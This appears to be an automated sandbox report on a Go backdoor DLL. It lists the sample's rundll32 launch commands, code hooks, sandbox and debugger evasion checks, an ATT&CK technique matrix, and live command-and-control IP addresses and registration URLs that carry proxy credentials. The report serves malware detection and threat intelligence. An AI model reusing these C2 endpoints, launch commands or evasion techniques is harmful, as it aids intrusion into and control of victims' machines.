        Source: rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://77.238.229.63
        Source: rundll32.exe, 00000006.00000002.3540333299.000000000CC56000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://77.238.250.123
        Source: rundll32.exe, 00000003.00000002.3540798444.000000000D05E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3540798444.000000000D05C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3543726410.000000000D1A6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3543726410.000000000D1A4000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3540333299.000000000CC56000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://77.238.250.123http://195.2.70.38
        Source: rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.142.74.28
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllString found in binary or memory: http://ocsp.globalsign.com/rootr30;
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllString found in binary or memory: http://ocsp2.globalsign.com/rootr606
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllString found in binary or memory: https://www.globalsign.com/repository/0

        System Summary

        barindex
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: section name: becb`
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: section name: [e[fe
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: section name: ^^STU
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: section name: bY^eU
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: section name: Y\d^_
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: section name: T]^[_
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: section name: eZ]e\
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: section name: f^Ycc
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: invalid certificate
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: Number of sections : 12 > 10
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
        Source: classification engineClassification label: mal88.troj.evad.winDLL@14/1@0/6
        Source: C:\Windows\System32\loaddll32.exeFile created: C:\Users\user\AppData\Local\configJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6892:120:WilError_03
        Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,MainFunc
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllReversingLabs: Detection: 36%
        Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll"
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,MainFunc
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,_cgo_dummy_export
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",MainFunc
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",_cgo_dummy_export
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1Jump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,MainFuncJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,_cgo_dummy_exportJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",MainFuncJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",_cgo_dummy_exportJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1Jump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: Image base 0x6c2c0000 > 0x60000000
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic file information: File size 15196072 > 1048576
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: Raw size of TUaYW is bigger than: 0x100000 < 0xe77600
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: initial sampleStatic PE information: section where entry point is pointing to: TUaYW
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: section name: becb`
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: section name: [e[fe
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: section name: ^^STU
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: section name: bY^eU
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: section name: a_SfU
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: section name: Y\d^_
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: section name: T]^[_
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: section name: eZ]e\
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: section name: f^Ycc
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: section name: cUfXW
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: section name: TUaYW
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: section name: SZVZY

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6860 base: 16F0005 value: E9 8B 2F 81 75 Jump to behavior
        Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6860 base: 76F02F90 value: E9 7A D0 7E 8A Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7020 base: 2810005 value: E9 8B 2F 6F 74 Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7020 base: 76F02F90 value: E9 7A D0 90 8B Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7100 base: 2E60005 value: E9 8B 2F 0A 74 Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7100 base: 76F02F90 value: E9 7A D0 F5 8B Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5480 base: 4920005 value: E9 8B 2F 5E 72 Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5480 base: 76F02F90 value: E9 7A D0 A1 8D Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7132 base: 520005 value: E9 8B 2F 9E 76 Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7132 base: 76F02F90 value: E9 7A D0 61 89 Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 3060 base: 650005 value: E9 8B 2F 8B 76 Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 3060 base: 76F02F90 value: E9 7A D0 74 89 Jump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6CCC5333
        Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6C0A8385
        Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6C0206AC
        Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6C0F89DD
        Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6CCFBD28
        Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6C9CAC5A
        Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6CBE2C2B
        Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6CBD697D
        Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6CCC7F85
        Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6C799AC7
        Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6C8036DF
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
        Source: loaddll32.exe, 00000000.00000002.3078250832.000000000126D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3539796517.0000000002CDA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3539212045.0000000002C4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3539177203.000000000067A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 77.238.229.63 80Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 195.2.70.38 80Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 77.238.224.56 80Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 91.142.74.28 80Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 77.238.250.123 80Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 94.103.90.9 26395Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7100, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7132, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7100, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7132, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        DLL Side-Loading
        111
        Process Injection
        1
        Masquerading
        1
        Credential API Hooking
        111
        Security Software Discovery
        Remote Services1
        Credential API Hooking
        1
        Non-Standard Port
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        DLL Side-Loading
        11
        Virtualization/Sandbox Evasion
        LSASS Memory1
        Process Discovery
        Remote Desktop ProtocolData from Removable Media1
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
        Process Injection
        Security Account Manager11
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive1
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Rundll32
        NTDS111
        System Information Discovery
        Distributed Component Object ModelInput Capture1
        Proxy
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1490750 Sample: SecuriteInfo.com.Win32.Malw... Startdate: 09/08/2024 Architecture: WINDOWS Score: 88 36 Multi AV Scanner detection for submitted file 2->36 38 Yara detected GO Backdoor 2->38 40 Connects to many ports of the same IP (likely port scanning) 2->40 42 2 other signatures 2->42 7 loaddll32.exe 2 2->7         started        process3 signatures4 50 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 7->50 52 Switches to a custom stack to bypass stack traces 7->52 10 cmd.exe 1 7->10         started        12 rundll32.exe 7->12         started        16 rundll32.exe 7->16         started        18 3 other processes 7->18 process5 dnsIp6 20 rundll32.exe 10->20         started        30 91.142.74.28, 49737, 49745, 49746 VTSL1-ASRU Russian Federation 12->30 32 195.2.70.38, 49736, 49743, 49744 VDSINA-ASRU Russian Federation 12->32 34 94.103.90.9, 26395, 49739 VDSINA-ASRU Russian Federation 12->34 54 System process connects to network (likely due to code injection or exploit) 12->54 56 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 12->56 58 Found Tor onion address 12->58 signatures7 process8 dnsIp9 24 77.238.224.56, 49747, 49748, 49757 TELERU-ASRU Russian Federation 20->24 26 77.238.229.63, 49749, 49750, 49759 TELERU-ASRU Russian Federation 20->26 28 77.238.250.123, 49751, 49752, 49761 TELERU-ASRU Russian Federation 20->28 44 System process connects to network (likely due to code injection or exploit) 20->44 46 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 20->46 48 Found Tor onion address 20->48 signatures10

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll37%ReversingLabsWin32.Trojan.Generic
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://77.238.224.560%Avira URL Cloudsafe
        http://195.2.70.38/0%Avira URL Cloudsafe
        http://77.238.250.123/0%Avira URL Cloudsafe
        http://77.238.250.123http://195.2.70.380%Avira URL Cloudsafe
        http://91.142.74.28/0%Avira URL Cloudsafe
        http://77.238.229.630%Avira URL Cloudsafe
        http://77.238.250.1230%Avira URL Cloudsafe
        http://91.142.74.280%Avira URL Cloudsafe
        http://77.238.229.63/0%Avira URL Cloudsafe
        http://77.238.224.56/0%Avira URL Cloudsafe
        http://195.2.70.380%Avira URL Cloudsafe

        Download Network PCAP: filteredfull

        No contacted domains info
        NameMaliciousAntivirus DetectionReputation
        http://195.2.70.38/true
        • Avira URL Cloud: safe
        unknown
        http://91.142.74.28/true
        • Avira URL Cloud: safe
        unknown
        http://77.238.229.63/true
        • Avira URL Cloud: safe
        unknown
        http://77.238.250.123/true
        • Avira URL Cloud: safe
        unknown
        http://77.238.224.56/true
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://77.238.224.56rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://77.238.250.123http://195.2.70.38rundll32.exe, 00000003.00000002.3540798444.000000000D05E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3540798444.000000000D05C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3543726410.000000000D1A6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3543726410.000000000D1A4000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3540333299.000000000CC56000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://77.238.229.63rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://77.238.250.123rundll32.exe, 00000006.00000002.3540333299.000000000CC56000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://91.142.74.28rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://195.2.70.38rundll32.exe, 00000006.00000002.3540333299.000000000CC56000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        91.142.74.28
        unknownRussian Federation
        48720VTSL1-ASRUtrue
        77.238.229.63
        unknownRussian Federation
        42429TELERU-ASRUtrue
        195.2.70.38
        unknownRussian Federation
        48282VDSINA-ASRUtrue
        77.238.250.123
        unknownRussian Federation
        42429TELERU-ASRUtrue
        94.103.90.9
        unknownRussian Federation
        48282VDSINA-ASRUtrue
        77.238.224.56
        unknownRussian Federation
        42429TELERU-ASRUtrue
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1490750
        Start date and time:2024-08-09 19:27:26 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 6m 28s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Run name:Run with higher sleep bypass
        Number of analysed new started processes analysed:13
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll
        Detection:MAL
        Classification:mal88.troj.evad.winDLL@14/1@0/6
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .dll
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • VT rate limit hit for: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll
        No simulations
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        91.142.74.28SecuriteInfo.com.Win32.Malware-gen.26009.9463.exeGet hashmaliciousGO BackdoorBrowse
        • 91.142.74.28:30001/api/helper-first-register?buildVersion=0Amd.uww2FVQ&md5=923ec5c02989f28b859f51c6956b5ad1&proxyPassword=acoplus&proxyUsername=acoplus&userId=4Sq6S3QBDg2k0LXayTco4Skn
        Notepad3_v6.23.203.2.exeGet hashmaliciousAmadey, GO BackdoorBrowse
        • 91.142.74.28/
        file.dllGet hashmaliciousUnknownBrowse
        • 91.142.74.28/
        file.dllGet hashmaliciousUnknownBrowse
        • 91.142.74.28/
        file.dllGet hashmaliciousUnknownBrowse
        • 91.142.74.28/
        file.dllGet hashmaliciousUnknownBrowse
        • 91.142.74.28/
        file.dllGet hashmaliciousUnknownBrowse
        • 91.142.74.28/
        file.dllGet hashmaliciousUnknownBrowse
        • 91.142.74.28/
        PZjMIa3MvC.exeGet hashmaliciousGO BackdoorBrowse
        • 91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=9b5ce04ec39c07546e6e12b6b60a6af0&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
        77.238.229.63SecuriteInfo.com.Win32.Malware-gen.26009.9463.exeGet hashmaliciousGO BackdoorBrowse
        • 77.238.229.63:30001/api/helper-first-register?buildVersion=0Amd.uww2FVQ&md5=923ec5c02989f28b859f51c6956b5ad1&proxyPassword=acoplus&proxyUsername=acoplus&userId=4Sq6S3QBDg2k0LXayTco4Skn
        Notepad3_v6.23.203.2.exeGet hashmaliciousAmadey, GO BackdoorBrowse
        • 77.238.229.63/
        file.dllGet hashmaliciousUnknownBrowse
        • 77.238.229.63/
        file.dllGet hashmaliciousUnknownBrowse
        • 77.238.229.63/
        file.dllGet hashmaliciousUnknownBrowse
        • 77.238.229.63/
        file.dllGet hashmaliciousUnknownBrowse
        • 77.238.229.63/
        file.dllGet hashmaliciousUnknownBrowse
        • 77.238.229.63/
        file.dllGet hashmaliciousUnknownBrowse
        • 77.238.229.63/
        PZjMIa3MvC.exeGet hashmaliciousGO BackdoorBrowse
        • 77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=9b5ce04ec39c07546e6e12b6b60a6af0&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        TELERU-ASRUSecuriteInfo.com.Win32.Malware-gen.26009.9463.exeGet hashmaliciousGO BackdoorBrowse
        • 77.238.224.56
        QTmGYKK6SL.exeGet hashmaliciousUnknownBrowse
        • 77.238.224.125
        Notepad3_v6.23.203.2.exeGet hashmaliciousAmadey, GO BackdoorBrowse
        • 77.238.224.56
        file.dllGet hashmaliciousUnknownBrowse
        • 77.238.224.56
        file.dllGet hashmaliciousUnknownBrowse
        • 77.238.224.56
        file.dllGet hashmaliciousUnknownBrowse
        • 77.238.224.56
        file.dllGet hashmaliciousUnknownBrowse
        • 77.238.224.56
        file.dllGet hashmaliciousUnknownBrowse
        • 77.238.224.56
        file.dllGet hashmaliciousUnknownBrowse
        • 77.238.224.56
